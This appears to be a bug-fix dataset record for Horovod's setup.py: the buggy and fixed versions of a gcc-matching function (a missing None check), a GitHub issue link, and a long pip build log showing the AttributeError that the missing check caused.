d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'Horovod with %s=1 to debug the build error.' % (ext_name, ext_env_var))
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ImportError: Extension horovod.mxnet has not been built. If this is not expected, reinstall Horovod with HOROVOD_WITH_MXNET=1 to debug the build error.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension mxnet was NOT built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/bin/horovodrun", line 21, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || run_commandline()
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/run/run.py", line 860, in run_commandline
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _run(args)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/run/run.py", line 828, in _run
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _launch_job(args, remote_host_names, settings, common_intfs, command)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/run/run.py", line 850, in _launch_job
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || elif gloo_built(verbose=(settings.verbose >= 2)):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 124, in gloo_built
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || raise RuntimeError('Failed to determine if Gloo support has been built. '
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || RuntimeError: Failed to determine if Gloo support has been built. Run again with --verbose for more details.
|
AssertionError
|
def find_matching_gcc_compiler_path(gxx_compiler_version):
for path_dir, bin_file in enumerate_binaries_in_path():
if re.match("^gcc(?:-\\d+(?:\\.\\d+)*)?$", bin_file):
# gcc, or gcc-7, gcc-4.9, or gcc-4.8.5
compiler = os.path.join(path_dir, bin_file)
compiler_version = determine_gcc_version(compiler)
if compiler_version and compiler_version == gxx_compiler_version:
return compiler
print("INFO: Unable to find gcc compiler (version %s)." % gxx_compiler_version)
return None
|
def find_matching_gcc_compiler_path(gxx_compiler_version):
for path_dir, bin_file in enumerate_binaries_in_path():
if re.match("^gcc(?:-\\d+(?:\\.\\d+)*)?$", bin_file):
# gcc, or gcc-7, gcc-4.9, or gcc-4.8.5
compiler = os.path.join(path_dir, bin_file)
compiler_version = determine_gcc_version(compiler)
if compiler_version == gxx_compiler_version:
return compiler
print("INFO: Unable to find gcc compiler (version %s)." % gxx_compiler_version)
return None
|
https://github.com/horovod/horovod/issues/1334
|
Looking in indexes: https://pypi.tuna.tsinghua.edu.cn/simple/
Collecting horovod
Using cached https://pypi.tuna.tsinghua.edu.cn/packages/8f/d9/67e496de0e04d314bb4bf3621442880486a560ab4e682f1c24ec7bf3c9b6/horovod-0.17.0.post1.tar.gz
Requirement already satisfied: cloudpickle in /home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages (from horovod) (1.1.1)
Requirement already satisfied: psutil in /home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages (from horovod) (5.6.2)
Requirement already satisfied: six in /home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages (from horovod) (1.12.0)
Requirement already satisfied: cffi>=1.4.0 in /home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages (from horovod) (1.12.3)
Requirement already satisfied: pycparser in /home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages (from cffi>=1.4.0->horovod) (2.19)
Building wheels for collected packages: horovod
Running setup.py bdist_wheel for horovod ... error
Complete output from command /home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/bin/python3.7 -u -c "import setuptools, tokenize;__file__='/tmp/pip-install-c74kecsx/horovod/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" bdist_wheel -d /tmp/pip-wheel-c74z94_t --python-tag cp37:
running bdist_wheel
running build
running build_py
creating build
creating build/lib.linux-x86_64-3.7
creating build/lib.linux-x86_64-3.7/horovod
copying horovod/__init__.py -> build/lib.linux-x86_64-3.7/horovod
creating build/lib.linux-x86_64-3.7/horovod/_keras
copying horovod/_keras/callbacks.py -> build/lib.linux-x86_64-3.7/horovod/_keras
copying horovod/_keras/__init__.py -> build/lib.linux-x86_64-3.7/horovod/_keras
creating build/lib.linux-x86_64-3.7/horovod/spark
copying horovod/spark/__init__.py -> build/lib.linux-x86_64-3.7/horovod/spark
creating build/lib.linux-x86_64-3.7/horovod/mxnet
copying horovod/mxnet/mpi_ops.py -> build/lib.linux-x86_64-3.7/horovod/mxnet
copying horovod/mxnet/__init__.py -> build/lib.linux-x86_64-3.7/horovod/mxnet
creating build/lib.linux-x86_64-3.7/horovod/torch
copying horovod/torch/mpi_ops.py -> build/lib.linux-x86_64-3.7/horovod/torch
copying horovod/torch/compression.py -> build/lib.linux-x86_64-3.7/horovod/torch
copying horovod/torch/__init__.py -> build/lib.linux-x86_64-3.7/horovod/torch
creating build/lib.linux-x86_64-3.7/horovod/common
copying horovod/common/util.py -> build/lib.linux-x86_64-3.7/horovod/common
copying horovod/common/basics.py -> build/lib.linux-x86_64-3.7/horovod/common
copying horovod/common/__init__.py -> build/lib.linux-x86_64-3.7/horovod/common
creating build/lib.linux-x86_64-3.7/horovod/run
copying horovod/run/task_fn.py -> build/lib.linux-x86_64-3.7/horovod/run
copying horovod/run/mpi_run.py -> build/lib.linux-x86_64-3.7/horovod/run
copying horovod/run/run.py -> build/lib.linux-x86_64-3.7/horovod/run
copying horovod/run/gloo_run.py -> build/lib.linux-x86_64-3.7/horovod/run
copying horovod/run/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run
creating build/lib.linux-x86_64-3.7/horovod/keras
copying horovod/keras/callbacks.py -> build/lib.linux-x86_64-3.7/horovod/keras
copying horovod/keras/__init__.py -> build/lib.linux-x86_64-3.7/horovod/keras
creating build/lib.linux-x86_64-3.7/horovod/tensorflow
copying horovod/tensorflow/mpi_ops.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow
copying horovod/tensorflow/util.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow
copying horovod/tensorflow/compression.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow
copying horovod/tensorflow/__init__.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow
creating build/lib.linux-x86_64-3.7/horovod/spark/task
copying horovod/spark/task/mpirun_exec_fn.py -> build/lib.linux-x86_64-3.7/horovod/spark/task
copying horovod/spark/task/task_service.py -> build/lib.linux-x86_64-3.7/horovod/spark/task
copying horovod/spark/task/__init__.py -> build/lib.linux-x86_64-3.7/horovod/spark/task
creating build/lib.linux-x86_64-3.7/horovod/spark/driver
copying horovod/spark/driver/driver_service.py -> build/lib.linux-x86_64-3.7/horovod/spark/driver
copying horovod/spark/driver/__init__.py -> build/lib.linux-x86_64-3.7/horovod/spark/driver
copying horovod/spark/driver/mpirun_rsh.py -> build/lib.linux-x86_64-3.7/horovod/spark/driver
copying horovod/spark/driver/job_id.py -> build/lib.linux-x86_64-3.7/horovod/spark/driver
creating build/lib.linux-x86_64-3.7/horovod/torch/mpi_lib
copying horovod/torch/mpi_lib/__init__.py -> build/lib.linux-x86_64-3.7/horovod/torch/mpi_lib
creating build/lib.linux-x86_64-3.7/horovod/torch/mpi_lib_impl
copying horovod/torch/mpi_lib_impl/__init__.py -> build/lib.linux-x86_64-3.7/horovod/torch/mpi_lib_impl
creating build/lib.linux-x86_64-3.7/horovod/run/common
copying horovod/run/common/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/common
creating build/lib.linux-x86_64-3.7/horovod/run/task
copying horovod/run/task/task_service.py -> build/lib.linux-x86_64-3.7/horovod/run/task
copying horovod/run/task/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/task
creating build/lib.linux-x86_64-3.7/horovod/run/util
copying horovod/run/util/threads.py -> build/lib.linux-x86_64-3.7/horovod/run/util
copying horovod/run/util/cache.py -> build/lib.linux-x86_64-3.7/horovod/run/util
copying horovod/run/util/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/util
copying horovod/run/util/network.py -> build/lib.linux-x86_64-3.7/horovod/run/util
creating build/lib.linux-x86_64-3.7/horovod/run/rendezvous
copying horovod/run/rendezvous/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/rendezvous
copying horovod/run/rendezvous/http_server.py -> build/lib.linux-x86_64-3.7/horovod/run/rendezvous
creating build/lib.linux-x86_64-3.7/horovod/run/driver
copying horovod/run/driver/driver_service.py -> build/lib.linux-x86_64-3.7/horovod/run/driver
copying horovod/run/driver/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/driver
creating build/lib.linux-x86_64-3.7/horovod/run/common/service
copying horovod/run/common/service/task_service.py -> build/lib.linux-x86_64-3.7/horovod/run/common/service
copying horovod/run/common/service/driver_service.py -> build/lib.linux-x86_64-3.7/horovod/run/common/service
copying horovod/run/common/service/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/common/service
creating build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/env.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/secret.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/codec.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/timeout.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/safe_shell_exec.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/settings.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/host_hash.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/network.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
creating build/lib.linux-x86_64-3.7/horovod/tensorflow/keras
copying horovod/tensorflow/keras/callbacks.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow/keras
copying horovod/tensorflow/keras/__init__.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow/keras
running build_ext
gcc -pthread -Wno-unused-result -Wsign-compare -DNDEBUG -g -fwrapv -O3 -Wall -fPIC -std=c++11 -fPIC -O2 -Wall -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/include -I/home/wyz/.pyenv/versions/3.7.2/include/python3.7m -c build/temp.linux-x86_64-3.7/test_compile/test_cpp_flags.cc -o build/temp.linux-x86_64-3.7/test_compile/test_cpp_flags.o
gcc -pthread -shared -L/home/wyz/.pyenv/versions/3.7.2/lib -L/home/wyz/.pyenv/versions/3.7.2/lib build/temp.linux-x86_64-3.7/test_compile/test_cpp_flags.o -o build/temp.linux-x86_64-3.7/test_compile/test_cpp_flags.so
gcc -pthread -Wno-unused-result -Wsign-compare -DNDEBUG -g -fwrapv -O3 -Wall -fPIC -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/include -I/home/wyz/.pyenv/versions/3.7.2/include/python3.7m -c build/temp.linux-x86_64-3.7/test_compile/test_link_flags.cc -o build/temp.linux-x86_64-3.7/test_compile/test_link_flags.o
gcc -pthread -shared -L/home/wyz/.pyenv/versions/3.7.2/lib -L/home/wyz/.pyenv/versions/3.7.2/lib -Wl,--version-script=horovod.lds build/temp.linux-x86_64-3.7/test_compile/test_link_flags.o -o build/temp.linux-x86_64-3.7/test_compile/test_link_flags.so
INFO: Unable to build TensorFlow plugin, will skip it.
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 72, in check_tf_version
import tensorflow as tf
ModuleNotFoundError: No module named 'tensorflow'
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 1375, in build_extensions
build_tf_extension(self, options)
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 851, in build_tf_extension
check_tf_version()
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 79, in check_tf_version
'import tensorflow failed, is it installed?\n\n%s' % traceback.format_exc())
distutils.errors.DistutilsPlatformError: import tensorflow failed, is it installed?
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 72, in check_tf_version
import tensorflow as tf
ModuleNotFoundError: No module named 'tensorflow'
gcc -pthread -Wno-unused-result -Wsign-compare -DNDEBUG -g -fwrapv -O3 -Wall -fPIC -std=c++11 -fPIC -O2 -Wall -I/usr/local/include -pthread -Wl,-rpath -Wl,/usr/local/lib -Wl,--enable-new-dtags -L/usr/local/lib -lmpi -I/usr/local/include -pthread -Wl,-rpath -Wl,/usr/local/lib -Wl,--enable-new-dtags -L/usr/local/lib -lmpi -Ithird_party/HTTPRequest/include -Ithird_party/boost/assert/include -Ithird_party/boost/config/include -Ithird_party/boost/core/include -Ithird_party/boost/detail/include -Ithird_party/boost/iterator/include -Ithird_party/boost/lockfree/include -Ithird_party/boost/mpl/include -Ithird_party/boost/parameter/include -Ithird_party/boost/predef/include -Ithird_party/boost/preprocessor/include -Ithird_party/boost/static_assert/include -Ithird_party/boost/type_traits/include -Ithird_party/boost/utility/include -Ithird_party/eigen -Ithird_party/flatbuffers/include -Ithird_party/lbfgs/include -Ithird_party/gloo -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages/torch/include -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages/torch/include/torch/csrc/api/include -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages/torch/include/TH -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages/torch/include/THC -I/usr/local/cuda/include -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/include -I/home/wyz/.pyenv/versions/3.7.2/include/python3.7m -c build/temp.linux-x86_64-3.7/test_compile/test_torch_cuda.cc -o build/temp.linux-x86_64-3.7/test_compile/test_torch_cuda.o
gcc -pthread -shared -L/home/wyz/.pyenv/versions/3.7.2/lib -L/home/wyz/.pyenv/versions/3.7.2/lib build/temp.linux-x86_64-3.7/test_compile/test_torch_cuda.o -o build/temp.linux-x86_64-3.7/test_compile/test_torch_cuda.so
/bin/sh: 1: /usr/lib/gcc: Permission denied
INFO: Unable to determine version of the compiler /usr/lib/gcc.
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 767, in determine_gcc_version
shell=True, universal_newlines=True).split('\n')
File "/home/wyz/.pyenv/versions/3.7.2/lib/python3.7/subprocess.py", line 395, in check_output
**kwargs).stdout
File "/home/wyz/.pyenv/versions/3.7.2/lib/python3.7/subprocess.py", line 487, in run
output=stdout, stderr=stderr)
subprocess.CalledProcessError: Command '/usr/lib/gcc -dM -E - </dev/null' returned non-zero exit status 126.
INFO: Unable to build PyTorch plugin, will skip it.
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 1389, in build_extensions
build_torch_extension_v2(self, options, torch_version)
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 1274, in build_torch_extension_v2
find_matching_gcc_compiler_path(candidate_compiler_version)
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 801, in find_matching_gcc_compiler_path
if compiler_version == gxx_compiler_version:
File "/home/wyz/.pyenv/versions/3.7.2/lib/python3.7/distutils/version.py", line 46, in __eq__
c = self._cmp(other)
File "/home/wyz/.pyenv/versions/3.7.2/lib/python3.7/distutils/version.py", line 335, in _cmp
if self.version == other.version:
AttributeError: 'NoneType' object has no attribute 'version'
-- The CXX compiler identification is GNU 7.4.0
-- The C compiler identification is GNU 7.4.0
-- Check for working CXX compiler: /usr/bin/c++
-- Check for working CXX compiler: /usr/bin/c++ -- works
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- Check for working C compiler: /usr/bin/cc
-- Check for working C compiler: /usr/bin/cc -- works
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Detecting C compile features
-- Detecting C compile features - done
-- Found MPI_C: /usr/local/lib/libmpi.so (found version "3.1")
-- Found MPI_CXX: /usr/local/lib/libmpi.so (found version "3.1")
-- Found MPI: TRUE (found version "3.1")
-- MPI include path: /usr/local/include
-- MPI libraries: /usr/local/lib/libmpi.so
-- Configuring done
-- Generating done
-- Build files have been written to: /tmp/pip-install-c74kecsx/horovod/build/temp.linux-x86_64-3.7/gloo/mxnet
Scanning dependencies of target gloo
[ 6%] Building CXX object gloo/CMakeFiles/gloo.dir/allgatherv.cc.o
[ 6%] Building CXX object gloo/CMakeFiles/gloo.dir/allgather.cc.o
[ 9%] Building CXX object gloo/CMakeFiles/gloo.dir/algorithm.cc.o
[ 12%] Building CXX object gloo/CMakeFiles/gloo.dir/allreduce.cc.o
[ 15%] Building CXX object gloo/CMakeFiles/gloo.dir/allreduce_local.cc.o
[ 18%] Building CXX object gloo/CMakeFiles/gloo.dir/barrier.cc.o
[ 21%] Building CXX object gloo/CMakeFiles/gloo.dir/broadcast.cc.o
[ 24%] Building CXX object gloo/CMakeFiles/gloo.dir/context.cc.o
[ 27%] Building CXX object gloo/CMakeFiles/gloo.dir/gather.cc.o
[ 30%] Building CXX object gloo/CMakeFiles/gloo.dir/reduce.cc.o
[ 36%] Building CXX object gloo/CMakeFiles/gloo.dir/scatter.cc.o
[ 36%] Building CXX object gloo/CMakeFiles/gloo.dir/types.cc.o
[ 39%] Building CXX object gloo/CMakeFiles/gloo.dir/common/linux.cc.o
[ 42%] Building CXX object gloo/CMakeFiles/gloo.dir/common/logging.cc.o
[ 45%] Building CXX object gloo/CMakeFiles/gloo.dir/mpi/context.cc.o
[ 48%] Building CXX object gloo/CMakeFiles/gloo.dir/rendezvous/context.cc.o
[ 51%] Building CXX object gloo/CMakeFiles/gloo.dir/rendezvous/file_store.cc.o
In file included from /tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/mpi/context.cc:16:0:
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/mpi/context.cc: In destructor ‘gloo::mpi::MPIScope::~MPIScope()’:
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/common/logging.h:141:58: warning: throw will always call terminate() [-Wterminate]
r.get_message_and_free(MakeString(__VA_ARGS__))); \
^
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/common/logging.h:150:3: note: in expansion of macro ‘GLOO_ENFORCE_THAT_IMPL’
GLOO_ENFORCE_THAT_IMPL(Equals((x), (y)), #x " == " #y, __VA_ARGS__)
^~~~~~~~~~~~~~~~~~~~~~
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/mpi/context.cc:43:3: note: in expansion of macro ‘GLOO_ENFORCE_EQ’
GLOO_ENFORCE_EQ(rv, MPI_SUCCESS);
^~~~~~~~~~~~~~~
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/common/logging.h:141:58: note: in C++11 destructors default to noexcept
r.get_message_and_free(MakeString(__VA_ARGS__))); \
^
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/common/logging.h:150:3: note: in expansion of macro ‘GLOO_ENFORCE_THAT_IMPL’
GLOO_ENFORCE_THAT_IMPL(Equals((x), (y)), #x " == " #y, __VA_ARGS__)
^~~~~~~~~~~~~~~~~~~~~~
/tmp/pip-install-c74kecsx/horovod/third_party/gloo/gloo/mpi/context.cc:43:3: note: in expansion of macro ‘GLOO_ENFORCE_EQ’
GLOO_ENFORCE_EQ(rv, MPI_SUCCESS);
^~~~~~~~~~~~~~~
[ 54%] Building CXX object gloo/CMakeFiles/gloo.dir/rendezvous/hash_store.cc.o
[ 57%] Building CXX object gloo/CMakeFiles/gloo.dir/rendezvous/prefix_store.cc.o
[ 60%] Building CXX object gloo/CMakeFiles/gloo.dir/rendezvous/store.cc.o
[ 63%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/address.cc.o
[ 66%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/buffer.cc.o
[ 69%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/context.cc.o
[ 72%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/device.cc.o
[ 75%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/pair.cc.o
[ 78%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/unbound_buffer.cc.o
[ 81%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/address.cc.o
[ 84%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/buffer.cc.o
[ 87%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/context.cc.o
[ 90%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/device.cc.o
[ 93%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/pair.cc.o
[ 96%] Building CXX object gloo/CMakeFiles/gloo.dir/transport/tcp/unbound_buffer.cc.o
[100%] Linking CXX static library /tmp/pip-install-c74kecsx/horovod/build/temp.linux-x86_64-3.7/lib/mxnet/libgloo.a
[100%] Built target gloo
INFO: Unable to build MXNet plugin, will skip it.
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 88, in check_mx_version
import mxnet as mx
ModuleNotFoundError: No module named 'mxnet'
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 1403, in build_extensions
build_mx_extension(self, options)
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 1000, in build_mx_extension
check_mx_version()
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 95, in check_mx_version
'import mxnet failed, is it installed?\n\n%s' % traceback.format_exc())
distutils.errors.DistutilsPlatformError: import mxnet failed, is it installed?
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 88, in check_mx_version
import mxnet as mx
ModuleNotFoundError: No module named 'mxnet'
error: None of TensorFlow, PyTorch, or MXNet plugins were built. See errors above.
----------------------------------------
Failed building wheel for horovod
Running setup.py clean for horovod
Failed to build horovod
Installing collected packages: horovod
Running setup.py install for horovod ... error
Complete output from command /home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/bin/python3.7 -u -c "import setuptools, tokenize;__file__='/tmp/pip-install-c74kecsx/horovod/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record /tmp/pip-record-zuqdc9ob/install-record.txt --single-version-externally-managed --compile --install-headers /home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/include/site/python3.7/horovod:
running install
running build
running build_py
creating build
creating build/lib.linux-x86_64-3.7
creating build/lib.linux-x86_64-3.7/horovod
copying horovod/__init__.py -> build/lib.linux-x86_64-3.7/horovod
creating build/lib.linux-x86_64-3.7/horovod/_keras
copying horovod/_keras/callbacks.py -> build/lib.linux-x86_64-3.7/horovod/_keras
copying horovod/_keras/__init__.py -> build/lib.linux-x86_64-3.7/horovod/_keras
creating build/lib.linux-x86_64-3.7/horovod/spark
copying horovod/spark/__init__.py -> build/lib.linux-x86_64-3.7/horovod/spark
creating build/lib.linux-x86_64-3.7/horovod/mxnet
copying horovod/mxnet/mpi_ops.py -> build/lib.linux-x86_64-3.7/horovod/mxnet
copying horovod/mxnet/__init__.py -> build/lib.linux-x86_64-3.7/horovod/mxnet
creating build/lib.linux-x86_64-3.7/horovod/torch
copying horovod/torch/mpi_ops.py -> build/lib.linux-x86_64-3.7/horovod/torch
copying horovod/torch/compression.py -> build/lib.linux-x86_64-3.7/horovod/torch
copying horovod/torch/__init__.py -> build/lib.linux-x86_64-3.7/horovod/torch
creating build/lib.linux-x86_64-3.7/horovod/common
copying horovod/common/util.py -> build/lib.linux-x86_64-3.7/horovod/common
copying horovod/common/basics.py -> build/lib.linux-x86_64-3.7/horovod/common
copying horovod/common/__init__.py -> build/lib.linux-x86_64-3.7/horovod/common
creating build/lib.linux-x86_64-3.7/horovod/run
copying horovod/run/task_fn.py -> build/lib.linux-x86_64-3.7/horovod/run
copying horovod/run/mpi_run.py -> build/lib.linux-x86_64-3.7/horovod/run
copying horovod/run/run.py -> build/lib.linux-x86_64-3.7/horovod/run
copying horovod/run/gloo_run.py -> build/lib.linux-x86_64-3.7/horovod/run
copying horovod/run/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run
creating build/lib.linux-x86_64-3.7/horovod/keras
copying horovod/keras/callbacks.py -> build/lib.linux-x86_64-3.7/horovod/keras
copying horovod/keras/__init__.py -> build/lib.linux-x86_64-3.7/horovod/keras
creating build/lib.linux-x86_64-3.7/horovod/tensorflow
copying horovod/tensorflow/mpi_ops.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow
copying horovod/tensorflow/util.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow
copying horovod/tensorflow/compression.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow
copying horovod/tensorflow/__init__.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow
creating build/lib.linux-x86_64-3.7/horovod/spark/task
copying horovod/spark/task/mpirun_exec_fn.py -> build/lib.linux-x86_64-3.7/horovod/spark/task
copying horovod/spark/task/task_service.py -> build/lib.linux-x86_64-3.7/horovod/spark/task
copying horovod/spark/task/__init__.py -> build/lib.linux-x86_64-3.7/horovod/spark/task
creating build/lib.linux-x86_64-3.7/horovod/spark/driver
copying horovod/spark/driver/driver_service.py -> build/lib.linux-x86_64-3.7/horovod/spark/driver
copying horovod/spark/driver/__init__.py -> build/lib.linux-x86_64-3.7/horovod/spark/driver
copying horovod/spark/driver/mpirun_rsh.py -> build/lib.linux-x86_64-3.7/horovod/spark/driver
copying horovod/spark/driver/job_id.py -> build/lib.linux-x86_64-3.7/horovod/spark/driver
creating build/lib.linux-x86_64-3.7/horovod/torch/mpi_lib
copying horovod/torch/mpi_lib/__init__.py -> build/lib.linux-x86_64-3.7/horovod/torch/mpi_lib
creating build/lib.linux-x86_64-3.7/horovod/torch/mpi_lib_impl
copying horovod/torch/mpi_lib_impl/__init__.py -> build/lib.linux-x86_64-3.7/horovod/torch/mpi_lib_impl
creating build/lib.linux-x86_64-3.7/horovod/run/common
copying horovod/run/common/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/common
creating build/lib.linux-x86_64-3.7/horovod/run/task
copying horovod/run/task/task_service.py -> build/lib.linux-x86_64-3.7/horovod/run/task
copying horovod/run/task/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/task
creating build/lib.linux-x86_64-3.7/horovod/run/util
copying horovod/run/util/threads.py -> build/lib.linux-x86_64-3.7/horovod/run/util
copying horovod/run/util/cache.py -> build/lib.linux-x86_64-3.7/horovod/run/util
copying horovod/run/util/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/util
copying horovod/run/util/network.py -> build/lib.linux-x86_64-3.7/horovod/run/util
creating build/lib.linux-x86_64-3.7/horovod/run/rendezvous
copying horovod/run/rendezvous/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/rendezvous
copying horovod/run/rendezvous/http_server.py -> build/lib.linux-x86_64-3.7/horovod/run/rendezvous
creating build/lib.linux-x86_64-3.7/horovod/run/driver
copying horovod/run/driver/driver_service.py -> build/lib.linux-x86_64-3.7/horovod/run/driver
copying horovod/run/driver/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/driver
creating build/lib.linux-x86_64-3.7/horovod/run/common/service
copying horovod/run/common/service/task_service.py -> build/lib.linux-x86_64-3.7/horovod/run/common/service
copying horovod/run/common/service/driver_service.py -> build/lib.linux-x86_64-3.7/horovod/run/common/service
copying horovod/run/common/service/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/common/service
creating build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/env.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/secret.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/codec.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/timeout.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/safe_shell_exec.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/settings.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/host_hash.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/network.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
creating build/lib.linux-x86_64-3.7/horovod/tensorflow/keras
copying horovod/tensorflow/keras/callbacks.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow/keras
copying horovod/tensorflow/keras/__init__.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow/keras
running build_ext
